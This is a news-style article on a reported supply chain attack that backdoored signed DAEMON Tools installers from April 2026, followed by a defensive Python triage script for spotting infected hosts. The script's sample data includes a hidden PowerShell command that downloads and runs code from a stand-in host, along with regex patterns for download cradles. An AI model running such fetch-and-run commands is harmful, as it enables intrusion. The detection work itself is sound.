Security researchers recently disclosed that the widely used virtual optical drive software DAEMON Tools has suffered a serious supply chain attack. Its official installer has been implanted with a backdoor since early April 2026 and distributed through formal channels, affecting thousands of devices around the world. According to the investigation results released by Kaspersky, the attackers invaded the legitimate installation package and injected malicious code into the officially digitally signed binary file, allowing the malicious program to be delivered disguised as a trusted software update.

Investigation shows that this round of attacks began on April 8, 2026: multiple versions of DAEMON Tools (12.5.0.2421 to 12.5.0.2434) were "poisoned", and the tampered installer was hosted directly on the software's official website and signed with a valid digital certificate belonging to the developer AVB Disc Soft, which greatly increased the likelihood that users would trust it and be deceived. Researchers pointed out that as of early May the attack was still ongoing and the corresponding malicious infrastructure was still active.

In this incident, multiple core executable files such as DTHelper.exe, DiscSoftBusServiceLite.exe, and DTShellHlp.exe were modified and hidden backdoor logic was added. Once the software is installed, these components run automatically at system boot and establish communication with external command and control (C2) servers. The attacker also registered and activated a domain name that was very similar to the official DAEMON Tools site name to disguise malicious traffic as normal access behavior; the domain name was only registered a few days before the attack started, showing that the attack was carefully premeditated and planned.

In terms of the attack chain, this operation showed a clearly staged structure. On most victim devices, the system first receives an information-stealing initial payload that collects a variety of environmental data, including MAC address, host name, list of installed software, running processes, network configuration, and system language/region settings. This data is uploaded to an attacker-controlled server and is presumably used to profile the infected system and assess its value, which then decides whether higher-level tools are deployed later. Researchers also found some Chinese character strings in the payload, suggesting that the attacker may be a Chinese-speaking user, but there is no formal attribution conclusion yet.

Although thousands of infection attempts have been detected worldwide, only a small number of target hosts actually received the second-stage malicious program. These "priority targets" are mostly affiliated with sectors such as government, manufacturing, scientific research, and retail. This limited, selective delivery of the second stage shows that this is not a simple opportunistic attack but something closer to a targeted operation aimed at intelligence collection or strategic penetration.

Among the confirmed second-stage tools, researchers found a minimalist backdoor that can execute commands, download files, and load malicious code directly into memory on the victim system to reduce its on-disk footprint. In at least one successful breach, the attackers also deployed an advanced implant called QUIC RAT. This malicious program supports multiple communication protocols, including HTTP, TCP, DNS and QUIC, and can inject its own code into legitimate processes such as notepad.exe, further concealing its activity.

Telemetry data shows that related infection attempts have been observed in more than 100 countries. Regions with the largest number of affected systems include Russia, Brazil, Turkey, Spain, Germany, France, Italy and China. About 10% of the affected devices belong to various organizations, and most of the rest only stay in the initial data collection stage and do not receive further second-stage payloads.

Kaspersky stated that its security products can detect and block this attack at multiple stages, including identifying suspicious PowerShell-based download behavior, malicious programs executed from temporary directories, code injection into legitimate processes, and abnormal outbound network communication patterns. The researchers recommend that any organization that installed DAEMON Tools after April 8, 2026 conduct a comprehensive audit of the relevant systems, focusing on abnormal PowerShell command-line activity and suspicious execution launched from temporary directories. At the same time, organizations should prioritize implementing a zero-trust security architecture, restrict execute permissions on temporary directories, and improve overall resilience through a layered defense strategy.
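The audit steps above can be turned into a small triage script. The following Python is an added example written for this article, not code from Kaspersky or from the DAEMON Tools project: it checks whether an installed build falls in the affected version range the article names, and it scans process-creation records for the two behaviors the researchers say to look for (PowerShell download activity and execution from temporary directories), plus a third heuristic, a PowerShell process spawned by one of the modified components named above. The record layout (`Image`, `CommandLine`, `ParentImage`) follows the Sysmon Event ID 1 field names, the regular expressions are this example's own heuristics rather than a published rule set, and the sample events are constructed; none of the paths or URLs in them are real indicators. Because the trojanized installer carried a valid developer signature, a signature check alone would not have flagged it, which is why the example hunts on behavior rather than on certificate validity.

```python
# Added triage example, not code from Kaspersky or the DAEMON Tools project.
# (1) version-range check against the affected builds named in the article;
# (2) behavioral scan of Sysmon-style process-creation records for the
#     activity the article recommends auditing. Patterns are assumed heuristics.
import ntpath
import re

# Affected build range as stated in the article (inclusive).
AFFECTED_MIN = (12, 5, 0, 2421)
AFFECTED_MAX = (12, 5, 0, 2434)

# Components the article names as modified; a shell spawned by one of them
# deserves a closer look (assumed heuristic, not a published rule).
MODIFIED_COMPONENTS = {"dthelper.exe", "discsoftbusservicelite.exe", "dtshellhlp.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Constructed markers for PowerShell download / encoded-command usage.
PS_DOWNLOAD = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient|"
    r"invoke-restmethod|start-bitstransfer|-enc(odedcommand)?\b",
    re.IGNORECASE,
)

# Executables launched from a per-user or system temporary directory.
TEMP_DIR = re.compile(r"\\(?:appdata\\local\\temp|windows\\temp|temp)\\", re.IGNORECASE)


def parse_version(text: str) -> tuple:
    """Turn '12.5.0.2421' into (12, 5, 0, 2421) so tuples compare numerically."""
    return tuple(int(part) for part in text.strip().split("."))


def is_affected_version(text: str) -> bool:
    """True if the installed build lies inside the poisoned range."""
    return AFFECTED_MIN <= parse_version(text) <= AFFECTED_MAX


def triage_events(events):
    """Return a list of {'rule', 'image'} findings for suspicious records."""
    findings = []
    for ev in events:
        image = ev.get("Image", "")
        parent = ev.get("ParentImage", "")
        cmdline = ev.get("CommandLine", "")
        image_name = ntpath.basename(image).lower()
        parent_name = ntpath.basename(parent).lower()

        # Rule 1: PowerShell invoked with a download or encoded-command marker.
        if image_name in POWERSHELL_IMAGES and PS_DOWNLOAD.search(cmdline):
            findings.append({"rule": "powershell_download", "image": image})
        # Rule 2: anything executing out of a temp directory.
        if TEMP_DIR.search(image):
            findings.append({"rule": "exec_from_temp", "image": image})
        # Rule 3: a modified DAEMON Tools component spawning PowerShell.
        if parent_name in MODIFIED_COMPONENTS and image_name in POWERSHELL_IMAGES:
            findings.append({"rule": "dt_component_spawns_powershell", "image": image})
    return findings


# Constructed sample records; no value here is a real indicator.
SAMPLE_EVENTS = [
    {   # helper component spawning a hidden PowerShell downloader
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                       ".DownloadString('http://example.invalid/u')\"",
        "ParentImage": r"C:\Program Files\DAEMON Tools Lite\DTHelper.exe",
    },
    {   # follow-on binary dropped into and run from the user's Temp folder
        "Image": r"C:\Users\alice\AppData\Local\Temp\svc_update.exe",
        "CommandLine": "svc_update.exe",
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    },
    {   # benign administrative PowerShell use, should not fire
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe Get-ChildItem C:\\Logs",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # the helper starting from its normal install path, should not fire
        "Image": r"C:\Program Files\DAEMON Tools Lite\DTHelper.exe",
        "CommandLine": "DTHelper.exe",
        "ParentImage": r"C:\Windows\System32\services.exe",
    },
]


if __name__ == "__main__":
    for build in ("12.5.0.2420", "12.5.0.2421", "12.5.0.2434", "12.5.0.2435"):
        print(build, "affected" if is_affected_version(build) else "not affected")
    for hit in triage_events(SAMPLE_EVENTS):
        print(hit["rule"], "->", hit["image"])
```

In practice the records would come from Sysmon or Security event 4688 exports rather than an inline list, and the temp-directory rule is the one that benefits most from the article's hardening advice: with execute permissions removed from temp directories, a hit on that rule becomes a policy violation as well as a detection.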

This DAEMON Tools supply chain incident once again shows that attackers are constantly refining their methods against the software supply chain, combining large-scale distribution with precise strikes and using legitimate, trusted software as a springboard into a wide range of environments. Under this trend, even commonly used software tools long regarded as "secure" must be treated as potential sources of risk, and organizations need to adopt more prudent and proactive security strategies to deal with increasingly complex supply chain threats.